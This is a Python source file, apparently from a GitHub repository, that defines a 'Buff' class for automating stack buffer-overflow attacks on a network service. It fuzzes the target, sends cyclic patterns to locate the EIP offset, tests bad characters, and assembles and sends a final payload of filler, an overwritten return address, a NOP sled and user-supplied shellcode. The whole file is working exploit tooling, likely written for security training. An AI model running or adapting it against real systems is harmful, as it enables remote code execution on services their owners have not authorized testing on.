-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathbuff.py
176 lines (127 loc) · 4.9 KB
/
buff.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
from typing import Callable
from . import constants
from . import fuzzer
from . import generator
from . import sender
# Constants
PLACEHOLDER_EIP = "BBBB"
class Buff:
def __init__(self, target: (str, int), prefix: str = "", postfix: str = ""):
# Custom exploitation methods
self.sender = sender.send_socket
self.fuzzer = fuzzer.fuzz
# Target
self.target = target
# Bad characters default from (1, 255)
self.bad_chars = constants.BAD_CHARS
# Prefix and Postfix
self.prefix = prefix
self.postfix = postfix
# Total Buffer Size
self.buffer_size = None
# EIP Address
self.eip_offset = None
self.eip_address = PLACEHOLDER_EIP
# NOPS
self.padding = ""
# Exploit
self.exploit = None
# --- Set Exploiters ---
def setSender(self, method: Callable) -> None:
self.sender = method
def setFuzzer(self, method: Callable) -> None:
self.fuzzer = method
# --- Exploit Configuration ---
def setPrefix(self, prefix: str) -> None:
self.prefix = prefix
def setPostfix(self, postfix: str) -> None:
self.postfix = postfix
def setBufferSize(self, buffer_size: int) -> None:
if buffer_size <= 0:
raise Exception("Buffer size must be greater than 0")
self.buffer_size = buffer_size
def setEipAddress(self, eip: str) -> None:
if len(eip) != 4:
raise Exception("EIP address length must be in 4")
self.eip_address = eip
def setEipOffset(self, offset: int) -> None:
if offset < 0:
raise Exception("EIP offset cannot be negative")
self.eip_offset = offset
def setPaddingSize(self, length: int) -> None:
self.padding = "\x90" * length
def setExploit(self, exploit: str) -> None:
self.exploit = exploit
# --- Fuzzer ---
def fuzz(self, timeout: int = 5, step_size: int = 100, sleep: int = 1) -> None:
self.fuzzer(self.target, timeout, self.prefix, self.postfix, step_size, sleep)
# --- Generic Sender ---
def send(self, buffer: str) -> None:
buffer = self.prefix + buffer + self.postfix
self.sender(self.target, buffer)
# --- Send Pattern ---
def generatePattern(self) -> str:
"""
PREFIX + BUFFERS + POSTFIX
"""
# check Buffer Size
if self.buffer_size is None:
raise Exception("Buffer size is not set")
return self.prefix + generator.generatePattern(self.buffer_size) + self.postfix
def sendPattern(self) -> None:
buffer = self.generatePattern()
self.sender(self.target, buffer)
# --- Bad Character Explit ---
def generateBadChars(self, exclude: [str] = None, fake_eip: str = PLACEHOLDER_EIP) -> str:
"""
PREFIX + BUFFERS + EIP + BAD CHARACTERS + POSTFIX
"""
if exclude is None:
exclude = []
# check EIP
if self.eip_offset is None:
raise Exception("EIP offset is not set")
# check Buffer Size
if self.buffer_size is None:
raise Exception("Buffer size is not set")
# filter exclusions
bad_chars = self.bad_chars
for ex in exclude:
bad_chars = bad_chars.replace(ex, "")
buffer = "A" * self.eip_offset
buffer += fake_eip # fake EIP to overflow address
buffer += bad_chars
# add remaning buffers if missing
if len(buffer) < self.buffer_size:
buffer += "A" * (self.buffer_size - len(buffer))
return self.prefix + buffer + self.postfix
def sendBadChars(self, exclude: [str] = None, fake_eip: str = PLACEHOLDER_EIP) -> None:
buffer = self.generateBadChars(exclude, fake_eip)
self.sender(self.target, buffer)
# --- Real Exploit ---
def generateExploit(self) -> str:
"""
PREFIX + BUFFERS + EIP + PADDING + EXPLOIT + POSTFIX
"""
# check EIP
if self.eip_offset is None:
raise Exception("EIP offset is not set")
if self.eip_address == PLACEHOLDER_EIP:
print(f"Warning: your EIP is a placeholder, {self.eip_address}. Are you sure you have set the correct return address")
# check Buffer Size
if self.buffer_size is None:
raise Exception("Buffer size is not set")
# check Exploit
if self.exploit is None:
raise Exception("Exploit is not set")
buffer = "A" * self.eip_offset
buffer += self.eip_address
buffer += self.padding
buffer += self.exploit
# add remaning buffers if missing
if len(buffer) < self.buffer_size:
buffer += "A" * (self.buffer_size - len(buffer))
return self.prefix + buffer + self.postfix
def sendExploit(self) -> None:
buffer = self.generateExploit()
self.sender(self.target, buffer)